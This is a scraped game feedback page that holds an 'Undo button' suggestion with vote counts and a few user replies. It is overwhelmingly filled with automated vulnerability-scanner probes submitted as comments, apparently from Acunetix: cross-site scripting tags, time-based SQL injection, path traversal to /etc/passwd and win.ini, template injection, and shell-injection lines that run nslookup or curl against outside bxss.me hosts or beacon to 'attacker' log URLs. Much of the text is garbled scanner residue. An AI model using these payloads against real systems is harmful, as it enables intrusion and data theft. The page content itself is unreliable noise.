Feedback
Submit suggestionUndo button by wombat - 152 months ago
Undo button so that you can remove mistakes
8065 agree
2858 agree
799 agree
772 agree
747 agree
746 agree
710 agree
682 agree
662 agree
661 agree
645 agree
633 agree
623 agree
622 agree
603 agree
592 agree
590 agree
579 agree
579 agree
573 agree
567 agree
565 agree
564 agree
564 agree
558 agree
553 agree
523 agree
522 agree
519 agree
511 agree
506 agree
498 agree
496 agree
493 agree
490 agree
488 agree
483 agree
479 agree
477 agree
470 agree
468 agree
465 agree
462 agree
461 agree
455 agree
455 agree
442 agree
434 agree
432 agree
420 agree
88TF
do you mean when you make the ships?Erik
This is a good idea! Noted.ALEJOCrack178YT
GOOD IDEA!ALEJOCrack178YT
GOOD IDEA!lxbfYeaa
1lxbfYeaa
1JJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1BBBG0IiIIOWfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>WfxYANoW
../../../../../../../../../../../../../../etc/passwd1bzMyHcpSO
1WfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpgWfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpgWfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
file:///etc/passwdWfxYANoW
http://bxss.me/t/fit.txt?.jpgAnonymous
1WfxYANoW
${10000199+9999030}${9999294+9999102}
1WfxYANoW
/etc/shellsWfxYANoW
1WfxYANoW
response.write(9320740*9136756)WfxYANoW
eJzFJ6EBWfxYANoW
../1WfxYANoW
../../../../../../../../../../../../../../etc/shellsWfxYANoW
echo yhbynb$()\ uoycwj\nz^xyu||a #' &echo yhbynb$()\ uoycwj\nz^xyu||a #|" &echo yhbynb$()\ uoycwj\nz^xyu||a #WfxYANoW
c:/windows/win.iniWfxYANoW
'+response.write(9320740*9136756)+'WfxYANoW
"+response.write(9320740*9136756)+"WfxYANoW
bxss.meWfxYANoW
&echo kipiji$()\ juadvh\nz^xyu||a #' &echo kipiji$()\ juadvh\nz^xyu||a #|" &echo kipiji$()\ juadvh\nz^xyu||a #WfxYANoW
RzGO4klT: ZLNIOSikresponse.write(9914219*9282101)
1ptG4PR5P
1rWLszvaT: mB1AQp3d
1WfxYANoW
1&echo kjgnxd$()\ qhfypw\nz^xyu||a #' &echo kjgnxd$()\ qhfypw\nz^xyu||a #|" &echo kjgnxd$()\ qhfypw\nz^xyu||a #'+response.write(9914219*9282101)+'
1WfxYANoW
1&n900088=v906107file:///etc/passwd
1WfxYANoW
|echo tckexr$()\ gwwryt\nz^xyu||a #' |echo tckexr$()\ gwwryt\nz^xyu||a #|" |echo tckexr$()\ gwwryt\nz^xyu||a #1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
1WfxYANoW
1WfxYANoW
1|echo wawhcy$()\ rrzdxj\nz^xyu||a #' |echo wawhcy$()\ rrzdxj\nz^xyu||a #|" |echo wawhcy$()\ rrzdxj\nz^xyu||a #WfxYANoW&n981864=v986388
1"+response.write(9914219*9282101)+"
1WfxYANoW
(nslookup -q=cname hitfhpigfxyau0e733.bxss.me||curl hitfhpigfxyau0e733.bxss.me))../WfxYANoW
1WfxYANoW
$(nslookup -q=cname hitbbodqsfpva38cf4.bxss.me||curl hitbbodqsfpva38cf4.bxss.me)WfxYANoW
)WfxYANoW
&nslookup -q=cname hityjbbrsahbm9bb4e.bxss.me&'\"`0&nslookup -q=cname hityjbbrsahbm9bb4e.bxss.me&`'ZndOY2pQeFE=
1WfxYANoW
&(nslookup -q=cname hitgkhxxcxdead73c9.bxss.me||curl hitgkhxxcxdead73c9.bxss.me)&'\"`0&(nslookup -q=cname hitgkhxxcxdead73c9.bxss.me||curl hitgkhxxcxdead73c9.bxss.me)&`'WfxYANoW
!(()&&!|*|*|WfxYANoW
|(nslookup -q=cname hitvjkfuypsaq5cefc.bxss.me||curl hitvjkfuypsaq5cefc.bxss.me)Http://bxss.me/t/fit.txt
1WfxYANoW
'.gethostbyname(lc('hithk'.'jpmrfjisab6c4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(77).chr(101).chr(68).'WfxYANoW
^(#$!@#$)(()))******http://bxss.me/t/fit.txt?.jpg
1WfxYANoW
`(nslookup -q=cname hitapfajcnrty4a152.bxss.me||curl hitapfajcnrty4a152.bxss.me)`WfxYANoW
".gethostbyname(lc("hitmw"."jfhaxtnd57527.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(82).chr(113).chr(69)."WfxYANoW
1WfxYANoW
;(nslookup -q=cname hitzrjfjuumpw31b9d.bxss.me||curl hitzrjfjuumpw31b9d.bxss.me)|(nslookup -q=cname hitzrjfjuumpw31b9d.bxss.me||curl hitzrjfjuumpw31b9d.bxss.me)&(nslookup -q=cname hitzrjfjuumpw31b9d.bxss.me||curl hitzrjfjuumpw31b9d.bxss.me)WfxYANoW
gethostbyname(lc('hitgt'.'edowdefw174da.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(86).chr(109).chr(78)WfxYANoW
1/etc/shells
1WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hitdjezenrjnud49c2.bxss.me||curl${IFS}hitdjezenrjnud49c2.bxss.me))
1WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hitzqthsmswdgb2f0b.bxss.me||curl${IFS}hitzqthsmswdgb2f0b.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitzqthsmswdgb2f0b.bxss.me||curl${IFS}hitzqthsmswdgb2f0b.bxss.me)&`'!(()&&!|*|*|
1WfxYANoW
'"()WfxYANoW
1'&&sleep(27*1000)*uutwob&&'WfxYANoW
';print(md5(31337));$a='WfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))WfxYANoW
";print(md5(31337));$a="^(#$!@#$)(()))******
1c:/windows/win.ini
1WfxYANoW
${@print(md5(31337))}bxss.me
1WfxYANoW
'"WfxYANoW
1"&&sleep(27*1000)*iqvpwy&&"WfxYANoW
<!--WfxYANoW
1'"()&%<zzz><ScRiPt >KJKG(9804)</ScRiPt>WfxYANoW
${@print(md5(31337))}\WfxYANoW
1'||sleep(27*1000)*depcyu||'WfxYANoW
xfs.bxss.me'"
1WfxYANoW
'"()&%<zzz><ScRiPt >KJKG(9238)</ScRiPt>WfxYANoW
'.print(md5(31337)).'xfs.bxss.me
1<!--
1WfxYANoW
1"||sleep(27*1000)*dvykgt||"WfxYANoW
19455203WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(102).concat(71).concat(101).concat(65)+(require"socket" Socket.gethostbyname("hituo"+"lxubyuajac90e.bxss.me.")[3].to_s)+"WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(116).concat(74).concat(112).concat(90)+(require'socket' Socket.gethostbyname('hitqw'+'qqjwtnfe19c47.bxss.me.')[3].to_s)+'WfxYANoW
1WfxYANoW
'A'.concat(70-3).concat(22*4).concat(98).concat(89).concat(117).concat(73)+(require'socket' Socket.gethostbyname('hitcw'+'cpthpmqqa7bfb.bxss.me.')[3].to_s)WfxYANoW
bxss.me/t/xss.html?%00WfxYANoW
bfg7810<s1﹥s2ʺs3ʹhjl7810WfxYANoW
comment'"()
1WfxYANoW
comment�HttP://bxss.me/t/xss.html?%00
1';print(md5(31337));$a='
1";print(md5(31337));$a="
1${@print(md5(31337))}
1bxss.me/t/xss.html?%00
1${@print(md5(31337))}\
1'.print(md5(31337)).'
1WfxYANoW'&&sleep(27*1000)*echwto&&'
1WfxYANoW
comment/.WfxYANoW"&&sleep(27*1000)*nsjsoh&&"
1WfxYANoW
<%={{={@{#{${dfb}}%>WfxYANoW'||sleep(27*1000)*vtmqir||'
1WfxYANoW"||sleep(27*1000)*czoale||"
1WfxYANoW
<th:t="${dfb}#foreachcomment
1comment�
1comment/.
1WfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
1WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >KJKG(9952)</ScRiPt>WfxYANoW
1<WOQBSH>9DGQY[!+!]</WOQBSH>WfxYANoW
1<script>KJKG(9597)</script>WfxYANoW
1<script>KJKG(9741)</script>9741WfxYANoW
1<ScR<ScRiPt>IpT>KJKG(9036)</sCr<ScRiPt>IpT>WfxYANoW
1pIc4PhJuWfxYANoW
1<ScRiPt >KJKG(9651)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9839></ScRiPt>WfxYANoW
1<�ScRiPt >KJKG(9446)</ScRiPt>WfxYANoW
1<isindex type=image src=1 onerror=KJKG(9514)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9661'>WfxYANoW
1<body onload=KJKG(9254)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=KJKG(9273)>WfxYANoW
1<img src=xyz OnErRor=KJKG(9411)>WfxYANoW
1<img/src=">" onerror=alert(9385)>WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%4B%4A%4B%47%289412%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1\u003CScRiPt\KJKG(9472)\u003C/sCripT\u003EWfxYANoW
1WfxYANoW
-1 OR 2+581-581-1=0+0+0+1 --WfxYANoW
-1 OR 2+634-634-1=0+0+0+1WfxYANoW
-1' OR 2+753-753-1=0+0+0+1 --WfxYANoW
1<ScRiPt>KJKG(9380)</sCripT>WfxYANoW
-1' OR 2+224-224-1=0+0+0+1 or '4RCnZCFV'='WfxYANoW
-1" OR 2+981-981-1=0+0+0+1 --WfxYANoW
1<input autofocus onfocus=KJKG(9608)>WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
1}body{zzz:Expre/**/SSion(KJKG(9124))}WfxYANoW
17wTYl <ScRiPt >KJKG(9670)</ScRiPt>WfxYANoW
1<WQP5HX>4DWJU[!+!]</WQP5HX>WfxYANoW
1<ifRAme sRc=9853.com></IfRamE>WfxYANoW
1<azMScQG x=9902>WfxYANoW
1*if(now()=sysdate(),sleep(15),0)WfxYANoW
1<img sRc='http://attacker-9138/log.php?WfxYANoW
1<aGIO7qG<WfxYANoW'"()&%<zzz><ScRiPt >KJKG(9106)</ScRiPt>
1'"()&%<zzz><ScRiPt >KJKG(9095)</ScRiPt>
1WfxYANoW9251180
1bfg1074<s1﹥s2ʺs3ʹhjl1074
1<%={{={@{#{${dfb}}%>
1<th:t="${dfb}#foreach
11}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1dfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1dfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >KJKG(9166)</ScRiPt>
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZWfxYANoW<WUSONN>SMZEO[!+!]</WUSONN>
1WfxYANoW<script>KJKG(9180)</script>
1WfxYANoW<script>KJKG(9414)</script>9414
1WfxYANoW<ScRiPt >KJKG(9925)</ScRiPt>
1WfxYANoW<�ScRiPt >KJKG(9967)</ScRiPt>
1WfxYANoW<body onload=KJKG(9198)>
1WfxYANoW<img src=xyz OnErRor=KJKG(9540)>
1WfxYANoW<img/src=">" onerror=alert(9525)>
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZWfxYANoW\u003CScRiPt\KJKG(9148)\u003C/sCripT\u003E
1WfxYANoW<ScRiPt>KJKG(9776)</sCripT>
1WfxYANoW<input autofocus onfocus=KJKG(9516)>
1<a HrEF=http://xss.bxss.me></a>
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(KJKG(9273))}
1WfxYANoWoG3bb <ScRiPt >KJKG(9855)</ScRiPt>
1WfxYANoW<WIPOGT>GGGSI[!+!]</WIPOGT>
1WfxYANoW<ifRAme sRc=9395.com></IfRamE>
1WfxYANoW<aTjnThB x=9960>
1WfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoW<img sRc='http://attacker-9172/log.php?
1WfxYANoW<aBWsZPF<
1WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1T4oEZrOQ'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 627=(SELECT 627 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 921=(SELECT 921 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 213=(SELECT 213 FROM PG_SLEEP(15))--WfxYANoW
1AnpsER8K' OR 366=(SELECT 366 FROM PG_SLEEP(15))--WfxYANoW
1i3Mx6iXy') OR 415=(SELECT 415 FROM PG_SLEEP(15))--WfxYANoW
1YYixIk5C')) OR 448=(SELECT 448 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@8866gWfxYANoW
1WfxYANoW
1WfxYANoWp1ZrHKrf
1WfxYANoW
1-1 OR 2+761-761-1=0+0+0+1 --
1-1 OR 2+963-963-1=0+0+0+1
1-1' OR 2+564-564-1=0+0+0+1 --
1-1' OR 2+340-340-1=0+0+0+1 or 'ibEl3WK4'='
1-1" OR 2+567-567-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoWZBLPowUN'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@V6uLn
1Peter Winter
555-555-0199@example.comPecedec150
555-555-0199@example.comwrxbyoas
1pldykkcv
response.write(9097969*9888120)pldykkcv
'+response.write(9097969*9888120)+'yghkdadu
1pldykkcv
"+response.write(9097969*9888120)+"yghkdadu
1lvxfnfwu
set|set&setresponse.write(9211725*9308293)
1yghkdadu
BCflPYLrlvxfnfwu
$(nslookup 96X9MOBM)'+response.write(9211725*9308293)+'
1yghkdadu
-1 OR 2+690-690-1=0+0+0+1 --lvxfnfwu
&nslookup uJbo4WPp&'\"`0&nslookup uJbo4WPp&`'"+response.write(9211725*9308293)+"
1qvdtoqcb
zkEBovznyghkdadu
-1 OR 2+424-424-1=0+0+0+1set|set&set
1sdghsbca
../../../../../../../../../../etc/passwdk8yJWxOi
1yghkdadu
-1' OR 2+619-619-1=0+0+0+1 --$(nslookup s0aNWGOL)
1sdghsbca
../../../../../../../../../../../../../../../proc/versionecvxmrkv
1yghkdadu
-1' OR 2+45-45-1=0+0+0+1 or 'xjtgEoly'='&nslookup qxfwI3BE&'\"`0&nslookup qxfwI3BE&`'
1pmrnrutj
${9999987+10000271}sdghsbca
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgyghkdadu
-1" OR 2+514-514-1=0+0+0+1 --kmxeligk
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg${9999253+9999830}
1sdghsbca
../../../../../../../../../../etc/passwd�.jpgODE3SzcxUFI=
1yghkdadu
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/kmxeligk
1some_inexistent_file_with_long_name�.jpglravsuwl
1&n907872=v975483sdghsbca
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpghfsrlklb
)yghkdadu
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/kmxeligk
Http://testasp.vulnweb.com/t/fit.txtsdghsbca
/../..//../..//../..//../..//../..//etc/passwd�.jpghfsrlklb
!(()&&!|*|*|ecvxmrkv
1yghkdadu
-1; waitfor delay '0:0:10' --kmxeligk
http://testasp.vulnweb.com/t/fit.txt?.jpgvsbbmyng&n963911=v925772
1sdghsbca
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdhfsrlklb
^(#$!@#$)(()))******Anonymous
1yghkdadu
-1); waitfor delay '0:0:3' --kmxeligk
testasp.vulnweb.comsdghsbca
/etc/passwd)
1yghkdadu
-1); waitfor delay '0:0:0' --sdghsbca
%2fetc%2fpasswd!(()&&!|*|*|
1yghkdadu
1 waitfor delay '0:0:3' --1some_inexistent_file_with_long_name�.jpg
1eukexnil
'"()iytylvey
;print(md5(acunetix_wvs_security_test));sdghsbca
/.././.././.././.././.././.././.././../etc/./passwd%00^(#$!@#$)(()))******
1fufpnojw
http://testasp.vulnweb.com/t/xss.html?%00.jpgyghkdadu
1 waitfor delay '0:0:7' --Http://testasp.vulnweb.com/t/fit.txt
1iytylvey
';print(md5(acunetix_wvs_security_test));$a='sdghsbca
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdpiyocera
1http://testasp.vulnweb.com/t/xss.html?%00.jpg
1yghkdadu
uBDusAwh'; waitfor delay '0:0:3' --http://testasp.vulnweb.com/t/fit.txt?.jpg
1'"()
1iytylvey
";print(md5(acunetix_wvs_security_test));$a="sdghsbca
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwdpiyocera
commentlmqvbbqj
http://hitlXfu5Pr5ur.bxss.me/yghkdadu
MILhqSu8'; waitfor delay '0:0:7' --testasp.vulnweb.com
1uulgkyeh
1iytylvey
${@print(md5(acunetix_wvs_security_test))}piyocera
comment�http://hitbwpue4bB8V.bxss.me/
1yghkdadu
-1;select pg_sleep(3); --wcurokpf
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))uulgkyeh
1'"iytylvey
${@print(md5(acunetix_wvs_security_test))}\sdghsbca
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.piyocera
comment/.udxkmfoj
/www.vulnweb.comyghkdadu
-1;select pg_sleep(10); --uulgkyeh
\;print(md5(acunetix_wvs_security_test));
1sdghsbca
file:///etc/passwdpiyocera
1/www.vulnweb.com
1yghkdadu
-1);select pg_sleep(3); --pnefddtg
'"';print(md5(acunetix_wvs_security_test));$a='
1sdghsbca
/\../\../\../\../\../\../\../etc/passwdcomment
1bgcwuevb
1'"()&%<acx><ScRiPt >FzTr(9095)</ScRiPt>yghkdadu
-1);select pg_sleep(10); --pnefddtg
<!--uulgkyeh
@@fEe5R";print(md5(acunetix_wvs_security_test));$a="
1sdghsbca
WEB-INF/web.xmlcomment�
1yghkdadu
-1));select pg_sleep(7); --'"
1uulgkyeh
JyI=${@print(md5(acunetix_wvs_security_test))}
1sdghsbca
/WEB-INF/web.xmlcomment/.
1yghkdadu
tXgZZz00';select pg_sleep(7); --<!--
1bgcwuevb
'"()&%<acx><ScRiPt >FzTr(9553)</ScRiPt>${@print(md5(acunetix_wvs_security_test))}\
1sdghsbca
WEB-INF\web.xmlyghkdadu
8fGPQuYq');select pg_sleep(7); --../../../../../../../../../../etc/passwd
1yghkdadu
MLJUEF9m'));select pg_sleep(7); --uulgkyeh
(select convert(int,CHAR(65)))bgcwuevb
1_9808yghkdadu
1uulgkyeh
1yghkdadu
11'"
1bgcwuevb
acu2042<s1﹥s2ʺs3ʹuca2042../../../../../../../../../../etc/passwd�.jpg
1WVkZD9xF
1\
1-1 OR 2+378-378-1=0+0+0+1 --
1-1 OR 2+60-60-1=0+0+0+1
1@@lYnQq
1-1' OR 2+704-704-1=0+0+0+1 --
1.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1JyI=
1bgcwuevb
{{9999145*9999143}}-1' OR 2+408-408-1=0+0+0+1 or '4c3fYVXK'='
1/etc/passwd
1-1" OR 2+806-806-1=0+0+0+1 --
1%2fetc%2fpasswd
1bgcwuevb
1<ScRiPt >FzTr(9554)</ScRiPt>(select convert(int,CHAR(65)))
11 waitfor delay '0:0:9' --
1bgcwuevb
1<WUIVWW>U8G9J[!+!]</WUIVWW>3JAw7xkz'; waitfor delay '0:0:9' --
1NCnUsQVJ';select pg_sleep(13); --
1bgcwuevb
1<script>FzTr(9715)</script>yKmJXjoP');select pg_sleep(13); --
1GsP11Wlx'));select pg_sleep(13); --
1file:///etc/passwd
1bgcwuevb
1<ScR<ScRiPt>IpT>FzTr(9124)</sCr<ScRiPt>IpT>/\../\../\../\../\../\../\../etc/passwd
1WEB-INF/web.xml
1bgcwuevb
1<ScRiPt >FzTr(9167)</ScRiPt>/WEB-INF/web.xml
1WEB-INF\web.xml
1bgcwuevb
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9623></ScRiPt>bgcwuevb
1<�ScRiPt >FzTr(9131)</ScRiPt>bgcwuevb
1<video><source onerror="javascript:FzTr(9480)">bgcwuevb
1<isindex type=image src=1 onerror=FzTr(9887)>bgcwuevb
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9750'>bgcwuevb
1<body onload=FzTr(9551)>bgcwuevb
1<img src=//testasp.vulnweb.com/t/dot.gif onload=FzTr(9340)>bgcwuevb
1<img src=xyz OnErRor=FzTr(9950)>bgcwuevb
1<img/src=">" onerror=alert(9658)>bgcwuevb
%31%3C%53%63%52%69%50%74%20%3E%46%7A%54%72%289964%29%3C%2F%73%43%72%69%70%54%3Ebgcwuevb
1\u003CScRiPt\FzTr(9145)\u003C/sCripT\u003Ebgcwuevb
1<ScRiPt>FzTr(9639)</sCripT>bgcwuevb
1<input autofocus onfocus=FzTr(9279)>bgcwuevb
<a HrEF=http://www.vulnweb.com></a>bgcwuevb
<a HrEF=jaVaScRiPT:>bgcwuevb
[url=http://www.vulnweb.com][/url]bgcwuevb
1<img<!-- --> src=x onerror=alert(9290);//><!-- -->bgcwuevb
1}body{acu:Expre/**/SSion(FzTr(9857))}bgcwuevb
1<% contenteditable onresize=FzTr(9882)>bgcwuevb
1_2ekSv <ScRiPt >FzTr(9041)</ScRiPt>bgcwuevb
1<WBB2GH>3AN0P[!+!]</WBB2GH>bgcwuevb
1<ifRAme sRc=9848.com></IfRamE>bgcwuevb
1<07SUTH x=9690>bgcwuevb
1<img sRc='http://attacker-9826/log.php?bgcwuevb'"()&%<acx><ScRiPt >FzTr(9389)</ScRiPt>
1'"()&%<acx><ScRiPt >FzTr(9647)</ScRiPt>
1bgcwuevb_9218
1acu8447<s1﹥s2ʺs3ʹuca8447
1{{9999344*10000257}}
1bgcwuevb<ScRiPt >FzTr(9424)</ScRiPt>
1bgcwuevb<WROH0N>5YBWN[!+!]</WROH0N>
1bgcwuevb<script>FzTr(9256)</script>
1bgcwuevb<ScRiPt >FzTr(9601)</ScRiPt>
1bgcwuevb<�ScRiPt >FzTr(9952)</ScRiPt>
1bgcwuevb<body onload=FzTr(9992)>
1bgcwuevb<img src=xyz OnErRor=FzTr(9361)>
1bgcwuevb<img/src=">" onerror=alert(9274)>
1bgcwuevb\u003CScRiPt\FzTr(9707)\u003C/sCripT\u003E
1bgcwuevb<ScRiPt>FzTr(9149)</sCripT>
1bgcwuevb<input autofocus onfocus=FzTr(9374)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1bgcwuevb}body{acu:Expre/**/SSion(FzTr(9738))}
1bgcwuevb<% contenteditable onresize=FzTr(9292)>
1bgcwuevb_cfui2 <ScRiPt >FzTr(9952)</ScRiPt>
1bgcwuevb<WL2RFJ>KWNH1[!+!]</WL2RFJ>
1bgcwuevb<ifRAme sRc=9665.com></IfRamE>
1bgcwuevb<0q3J9k x=9314>
1bgcwuevb<img sRc='http://attacker-9974/log.php?
1Comment